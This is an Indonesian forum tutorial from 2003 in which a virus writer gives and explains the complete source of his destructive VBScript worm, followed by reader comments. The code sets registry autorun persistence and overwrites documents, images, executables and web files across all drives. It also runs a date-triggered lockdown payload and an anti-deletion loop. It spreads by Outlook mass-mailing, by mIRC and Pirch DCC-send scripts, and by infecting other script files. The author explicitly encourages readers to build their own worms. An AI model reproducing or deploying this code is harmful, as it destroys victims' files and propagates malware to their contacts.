Jasakom Community
Jadikan Jasakom Homepage anda Training IT-Security IT-Services
Menu
Main
Bugs
Hacking
Tutorial
Diskusi
Lain-lain
About Us

Bergabung dengan milis Jasakom-perjuangan


 
TUTORIAL VBS.TNI.VS.GAM.WORM
Wednesday, September 17, 2003- Jumlah Klik [3873] , Penulis : sevenC / N0:7
Jasakom - Disini saya akan mencoba menerangkan code2 worm vbs.tnivsgam yang saya buat desember 2002 lalu. ---------------------------- 
Setelah anda membaca tulisan saya ini,saya sangat mengharapkan anda bisa segera bisa membuat code2 worm anda sendiri dan 
beraksi menuangkan imajinasi anda kedalam code2 worm buatan anda sendiri.
 
WARNING : Seperti biasa,saya menulis artikel ini 100% ditujukan sebagai sarana pengetahuan saja,dan saya tidak mau 
menanggung resiko sekecil apapun jika ada penyalahgunaan artikel yang saya buat ini.
 
------------------------------------------code & penjelasan dimulai dari sini
'VBS.GAM-VS-TNI.sevenC by N0:7
'It would be given to idiot person (SPTH)
'Bentuk perlawanan SevenC terhadap penindasan HAM di ACEH
'+++++sevenC+++++
 
-Ini baris2 pertama tau maksudnya ? menggapa diawali tanda (') ? yahh bener itu baris cuma buat komentar aja dan gak bakal 
dieksekusi... syaratnya ya harus diawali tanda petik ini (').
 
on error resume next
 
-Jika anda berada dalam pemrograman yangg berifat basic2 jangan pernah melupakan baris ini, mengapa ? Karna program worm 
yang akan anda buat pasti akan berhenti jika ada kesalahan pertama kali sewaktu dieksekusi,anda tentunya gak mau worm 
buatan anda berhenti ditengah atau bahkan diawal jalan bukan ? hehehehe....:)
 
Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder , STRINGMAN
 
-Sebelum memberi nilai pada variabel,adaa baiknya anda mendeklarasikan terlebih dahulu variabel2 yang akan anda beri nilai 
/ data.
 
Set fso = createobject("scripting.filesystemobject")
 
- Menset variabel fso agar bisa menulis//membaca objek,ini musti ditulis karna akan sangat berguna sekali nanti.
 
TNI = fso.getspecialfolder(0)
 
Menset TNI dengan menggunakan variable fso yang telah kita deklarasikan tadi dengan menambahkan fungsi 
.getspecialfolder(0) yang artinya worm aseli/backup anda akan terletak pada folder ini,difolder apakah itu ? yaa... betul 
untuk (0) adalah folder windowz
 
GAM = TNI & "\system.vbs"
 
- Nah ini dia worm backup dengan nama syystem.vbs yang berada dalam direktori TNI tadi.
 
Set MEGAWATI = createobject("wscript.shell")
 
-Menset megawati agar menjalankan wscrippt untuk mengeksekusi code2 worm ini.
 
MEGAWATI.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & GAM & " %"
 
- Membuat worm backup tersebut (system.vvbs) otomatis dijalankan setiap windows booting
 
fso.copyfile wscript.scriptfullname, GAM
 
- Membuat copyan (textream) seluruh skriip worm ini untuk dicetak pada system.vbs (worm backup)
 
'I will give this at my birthday
'Gw akan kasih hadiah ini waktu gw ulang tahun heheheheh....
If month(now) = 9 and day(now) = 19 then
MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD"
MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 1, "REG_DWORD"
MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled", 1, "REG_DWORD"
MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", 1, "REG_DWORD"
MEGAWATI.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 1, "REG_DWORD"
end if
 
- Ini payload yang gw buat pada hari ulaang tahun gw 19 september,jadi setiap tanggal tsb payload ini dijalankan.
 
If MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sevenC_zone\wtyeuy928090266") <> 1 then
WW32145
end if
 
If MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sevenC_zone\SSSSSSS12XCV") <> 1 then
LOGHARYTHM1Z
end if
 
If MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\sevenC_zone\RTWYJGJGSKK1202") <> 1 then
SEVENDUST
end if
 
- Ini teknik gw yang gw kasih nama "seveen-fake-the-shitty-reg  (SFTSR) ",AV2 tahun 2002 belum bisa menditeksinya
sebenarnya baris2 diatas cuma manipulasi statement kondisi yang memakai manipulasi file *.reg,yang intinya cuma sebagai 
loncatan2 kepada fungsi2 ini : 
fungsi WW32145()
fungsi LOGHARYTHM1Z()
fungsi SEVENDUST()
jika loe minat untuk mempelajari lebih jauh ttg teknik ini silahkan kunjungin homepage gw http://sevenc.vze.com
 
STRINGMAN =
 "777777777raursuyrsuaystiu77777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
7777777777777777777777777777777777777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777 77777777777777777777777777777777777777777777777777777!
 777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
777777777777777777777777 777777777777777777777777777777777777777777777777777777777777777777777777777777
77777777777777777777777777777777HAHAHAHAHAH THIS IS MY SEVENS STRING FOR YOU WHERE IS YOUR AV'S ?"
 
- Memberi data string pada variabel STRIINGMAN.
info : ini digunakan untuk merusak file2 program dan bukan untuk penyebaran (sevenC's warning : SANGAT BERBAHAYA)
 
Set Drives=fso.drives 
For Each Drive in Drives
If drive.isready then
Dosearch drive
end If 
Next 
 
- sepertinya baris2 diatas pernah saya jjelaskan di jasakom, dengan judul "FUNGSI WORM VBS" yaitu teknik bagaimana worm

 bisa menyebar dan menginfeksi file2 di seluruh harddisk.
 
function Dosearch(path)
on error resume next
Set Folder=fso.getfolder(path) 
Set Files = folder.files 
For Each File in files
If fso.GetExtensionName(file.path)="htm" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="html" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="js" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="com" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="exe" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="php" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="jsp" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="txt" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="mp3" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="asp" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="doc" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
If fso.GetExtensionName(file.path)="jpg" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline stringman
drop.close
end if
next
Set Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
Dosearch Subfolder.path 
Next 
end function 
 
- Ini juga terdapat pada tutorial saya yyang berjudul "FUNGSI WORM VBS"
nah loe bisa liat ekstensi2 file yang akan dirusak oleh worm ini seperti jpg,doc,asp dll
 
'AntiDeletion function
'I take this from [K]alamar
Set Kalamar = fso.opentextfile(wscript.scriptfullname)
sevenC = Kalamar.readall
Kalamar.close
Do
if not(fso.fileexists(wscript.scriptfullname)) then
set ANTISCRIPT= fso.createtextfile(wscript.scriptfullname)
ANTISCRIPT.write sevenC
ANTISCRIPT.close
end if
KALAMAR2 = MEGAWATI.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate")
If KALAMAR2 <> "wscript.exe " & GAM & " %" then
MEGAWATI.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & GAM & " %"
end if
KALAMAR2= ""
loop
 
ini teknik antideletion yang gw dapet dari [K], gw pernah buat tutorial di jasakom
 
Function WW32145()
Set HK6Q2788 = CreateObject("Outlook.Application")
If HK6Q2788 = "Outlook" Then
Set LFD818HB = HK6Q2788.GetNameSpace("MAPI")
Set MS97DFA0 = LFD818HB.AddressLists
For Each I6166352 In MS97DFA0
If I6166352.AddressEntries.Count <> 0 Then
CFJ3AVGM = I6166352.AddressEntries.Count
For G2T0QB76 = 1 To CFJ3AVGM
Set UF0MVV64 = HK6Q2788.CreateItem(0)
Set RHR543O8 = I6166352.AddressEntries(G2T0QB76)
UF0MVV64.To = RHR543O8.Address
UF0MVV64.Subject = "Very Important!"
UF0MVV64.Body = "Hi:" & vbcrlf & "Please view this file, it's very important to help my country" & vbcrlf & ""
execute "set SG63KH0F =UF0MVV64." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & 
Chr(101) & Chr(110) & Chr(116) & Chr(115)
I2512RET = V2F5FODG
UF0MVV64.DeleteAfterSubmit = True
SG63KH0F.Add I2512RET
If UF0MVV64.To <> "" Then
UF0MVV64.Send
End If
Next
End If
Next
End If
End function
 
- Ini fungsi dari variabel WW32145() berrguna untuk penyebaran worm melalui outlook.function 
 
function LOGHARYTHM1Z()
If N0WARFORIRAK <> "" Then
FRS46KB8 = MEGAWATI.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If fso.fileexists("c:\mirc\mirc.ini") Then
N0WARFORIRAK = "c:\mirc"
ElseIf fso.fileexists("c:\mirc32\mirc.ini") Then
N0WARFORIRAK = "c:\mirc32"
ElseIf fso.fileexists(FRS46KB8 & "\mirc\mirc.ini") Then
N0WARFORIRAK = FRS46KB8 & "\mirc"
ElseIf fso.fileexists(FRS46KB8 & "\mirc32\mirc.ini") Then
N0WARFORIRAK = FRS46KB8 & "\mirc"
Else
N0WARFORIRAK = ""
End If
End If
If N0WARFORIRAK <> "" Then
Set ANTIUSA = fso.CreateTextFile(N0WARFORIRAK & "\script.ini", True)
ANTIUSA = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
ANTIUSA = ANTIUSA & vbCrLf & "n0=on 1:JOIN:#:{"
ANTIUSA = ANTIUSA & vbCrLf & "n1=  /if ( $nick == $me ) { halt }"
ANTIUSA = ANTIUSA & vbCrLf & "n2=  /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
ANTIUSA = ANTIUSA & GAM
ANTIUSA = ANTIUSA & vbCrLf & "n3=}"
script.Close
End If
End Function
 
-ini fungsi dari variabel LOGHARYTHM1Z bberguna untuk penyebaran worm melalui mirc
 
SEVENDUST()
If THEASSH0L3 <> "" Then
FRS46KB8 = MEGAWATI.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If fso.fileexists("C:\Pirch98\events.ini") Then
THEASSH0L3 = "C:\Pirch98"
ElseIf fso.fileexists(FRS46KB8 & "\Pirch98\events.ini") Then
BIP78A4V = FRS46KB8 & "\Pirch98"
else
THEASSH0L3 = ""
END IF
END IF
If THEASSH0L3 <> "" Then
Set MB534QR6 = fso.CreateTextFile(THEASSH0L3 & "\script.ini", True)
MB534QR6.writeline "[Levels]" 
MB534QR6.writeline "Enabled=1"
MB534QR6.writeline "Count=6"
MB534QR6.writeline "Level1=000-Unknows"
MB534QR6.writeline "000-UnknowsEnabled=1"
MB534QR6.writeline "Level2=100-Level 100"
MB534QR6.writeline "100-Level 100Enabled=1"
MB534QR6.writeline "Level3=200-Level 200"
MB534QR6.writeline "200-Level 200Enabled=1"
MB534QR6.writeline "Level4=300-Level 300"
MB534QR6.writeline "300-Level 300Enabled=1"
MB534QR6.writeline "Level5=400-Level 400"
MB534QR6.writeline "400-Level 400Enabled=1"
MB534QR6.writeline "Level6=500-Level 500"
MB534QR6.writeline "500-Level 500Enabled=1"
MB534QR6.writeline "[000-Unknowns]"
MB534QR6.writeline "User1=*!*@*"
MB534QR6.writeline "UserCount=1"
MB534QR6.writeline "Events1= ON JOIN:#: /dcc send $nick " & GAM
MB534QR6.writeline "EventCount=1"
MB534QR6.writeline "[100-Level 100]"
MB534QR6.writeline "UserCount=0"
MB534QR6.writeline "EventCount=0"
MB534QR6.writeline "[200-Level 200]"
MB534QR6.writeline "UserCount=0"
MB534QR6.writeline "EventCount=0"
MB534QR6.writeline "[300-Level 300]"
MB534QR6.writeline "UserCount=0"
MB534QR6.writeline "EventCount=0"
MB534QR6.writeline "[400-Level 400]"
MB534QR6.writeline "UserCount=0"
MB534QR6.writeline "EventCount=0"
MB534QR6.writeline "[500-Level 500]"
MB534QR6.writeline "UserCount=0"
MB534QR6.writeline "EventCount=0"
END IF
end function
 
- ini fungsi SEVENDUST() berguna untuk mmenyebarkan worm melalui pirch98
 
Function E2D8VU73(LEDKTM5D)
CV757O21 = LEDKTM5D
Set BSID3GF6 = fso.GetFolder(CV757O21)
Set GOM9KI8K = BSID3GF6.Files
For Each OM28U374 In GOM9KI8K
If lcase(OM28U374.Name) = "mirc.ini" Then
LOGHARYTHM1Z(OM28U374.ParentFolder)
End If
If fso.GetExtensionName(OM28U374.path) = "vbs" then
fso.CopyFile wscript.scriptfullname,OM28U374.path,true
End if
If fso.GetExtensionName(OM28U374.path) = "vbe" then
fso.CopyFile wscript.scriptfullname,OM28U374.path,true
End if
Next
Set L7QK6Q27 = BSID3GF6.Subfolders
For Each LN4FD818 In L7QK6Q27
Call (LN4FD818.path)
Next
End function
 
-Ini fungsi E2D8VU73() barguna untuk mennyebarkan worm ke file2 VBS yang lain.
 
--------------------------------------------------------selesai
 
Akhirnya selesai juga....
 
spesifikasi WORM.VBS.TNI.VS.GAM.b.VBS  :
 
 
Terditeksi oleh NAV sebagai : WORM.VBS.VBSWG2@mm.
Terditeksi oleh F-PROT sebagai : I-gam.b
POLYMORPHIC : ga dipake
FAKE-DROPING : Dipake
JUMP-METHOD : gak dipake
Infect files : VBS,VBE
Droping Faker : htm,html,js,com,exe,php,txt,jpg mp3,jsp,doc,gif,asp
PAYLOAD : dijalankan setiap tanggal 19 september (hari ultah sevenC)
 
 
worm ini termasuk ganas karna itu tidak diajurkan di test pada PC sendiri.
karna bersifat destruktif maka versi beta tester worm ini tidak saya buat.
 
salam hangat selalu dari GEMBEL & GELANDANGAN DEPOK.
 
greetz & thankz to :
 
1. TEMAN2 SECTOR-S UNDERGROUND TEAM /  S.U.T [ http://sectors.vze.com/ ]
2. [K]alamar for greatz support and AD technuiqe
3. VIRUS-BUSTER-INTERNATIONAL-FORUM / VBIF
4. #vir , #virii.ar , #virux , #virus
5. P-80 international security factor
6. Dan buat jasakom makasih aja udah mau mostingin.
 
 
 
 
 
writen by
sevenC / N0:7
19 AGUSTUS 2003 jam 21.42 WIB
http://sevenc.vze.com/
[email protected]
 
 
read this : Artikel ini murni ditujukan untuk pengetahuan semata,dan saya membuatnya dengan cuma2
            karna saya sangat menghargai apa itu pengetahuan,dan apalah artinya ilmu saya jika tidak
            diamalkan.
            jadi bagi anda yang ingin meriping artikel ini,untuk kepentingan pribadi semata
            saya harap untuk menghapus nama asli / keterangan penulis yang ada dalam artikel ini.
            karna saya pribadi tidak ingin jika artikel ini menjadi sarana pedoman lamer yang
            bersifat merusak.
            Mohon maaf jika ada kata2 saya yang menyinggung saudara,maklumlah...anak ABG...:)
            Wassalamualaikum Wr.Wb
Hosted by www.Geocities.ws
Berikan Pendapat Anda Untuk Artikel Ini       

Nama : Musawarman
Comment : Ass. Tedy masih ingat ma gw ga. Wah udah jago nih sekarang. Lo di IT juga ted, awas jangan buat virus ya nanti dimarahin mama loh hehehe... Salam buat para ilkomerz disana ya... Wss.
ID : 30611

Nama : Musawarman
Comment : Ass. Tedy masih ingat ma gw ga. Wah udah jago nih sekarang. Lo di IT juga ted, awas jangan buat virus ya nanti dimarahin mama loh hehehe... Salam buat para ilkomerz disana ya...
ID : 30609

Nama : sulix
Comment : virii .... trojan .... vbs ... LAME !!!! Mao source W32.BLOODHOUND.VBWORM ??? gw punya dunx .... hehehehe
ID : 12264

Nama : ndeklaimber
Comment : Sto.... Selektif dikit ah kalau milih kontributor, yang baca kan bukan cuman orang Indonesia, kalo Spth ikut baca gimana ???
ID : 11207

Nama : ndeklaimber
Comment : 19.05.2003: Today I got a mail by Kefi telling me, that a person named SevenC ripped my whole BWG! He haven't changed anything in he code, just the infos are changed. Also KAV detect it as Constructor.BAT.BWG.501, and the output is detect as I-Worm.BWG.d. You will find it here. Thanks lamer! (http://www.geocities.com/spth666/main.htm)
ID : 11206

Nama : ndeklaimber
Comment : SevenC pernah njiplak mentah2 salah satu program bikinan Spth. Kok sekarang malah bilang Spth sebagai idiot ??? '======================================== 'VBS.GAM-VS-TNI.sevenC by N0:7 'It would be given to idiot person (SPTH) '======================= ================= Untuk jelasnya silakan lihat di http://www.geocities.com/spth666/main.htm Di sana Spth menuliskan perasaannya (jurnal harian tanggal 19.05.2003). Sadar SevenC, sadar... Di atas langit masih ada langit.
ID : 11205

Nama : TimBoel
Comment : Hmmm bagus juga... emang untuk bikin suatu program anti virus kita harus tau juga cara kerja dari virus itu sendiri... mudah2an dgn adanya artikel ini semaking banyak orang indonesia yg pinter buat program antivirus walaupun sebenernya dia juga ahli dalam membuat virus :-) bravo sevenC
ID : 11108

Nama : ceuliq
Comment : Puasa Nich Minta Maaf Dulu sama semuanya ...... but ngehack-ing kira kira hukumnya apaan ya..... nice script ... tell me more ......! bye
ID : 11023

Nama : Braveheart
Comment : Hm....source-nya boleh juga..tinggal pengembangannya aja...mungkin kita bisa pelajari bersama gimana caranya ngembangin source yang udah ada ini. Itung-itung kan nambah elmu juga buat kita.
ID : 10919

Nama : scureboy
Comment : lumayan ;) emang worm vbs gitu2 aja, nanam autorun registry, overwrite file2, hiding pake double extension, spread via program2 bego macam outlook, tp hanya menginfeksi user2 berperilaku bego (seperti bunuh diri dgn jalanin vbs ini di pc sendiri, skalian aja hapus smua file2 di h/d loe sendiri, huhueheuheu)..
ID : 10889

Nama : achonk
Comment : Bo`ong Yaaa ....
ID : 10881

Nama : Flins
Comment : huah.....worm itu gimana seh......//ketawa
ID : 10860

Nama : ASOY
Comment : WoW.. BRAVO 2 sevenC
ID : 10829

Nama : gmt
Comment : Utk Watcher : buat worm itu gampang dan gak ada seninya apalagi cuman kopi-kopi subroutine dari worm generator !! Buatlah program yg bisa berguna bagi banyak org !!
ID : 10814

Nama : gmt
Comment : maap kalo komen saya telah menyinggung, saya juga seorang newbie, tapi suka gregetan kalo ngeliat program yg brantakan plus asal kopi doang, setidaknya ganti nama subrutinenya kek...:) dengan ini permintaan maaf telah disampaikan !!
ID : 10813

Nama : 'an sy
Comment : HEEE..... BAGUS SEVEN_C
ID : 10812

Nama : n3wbi35
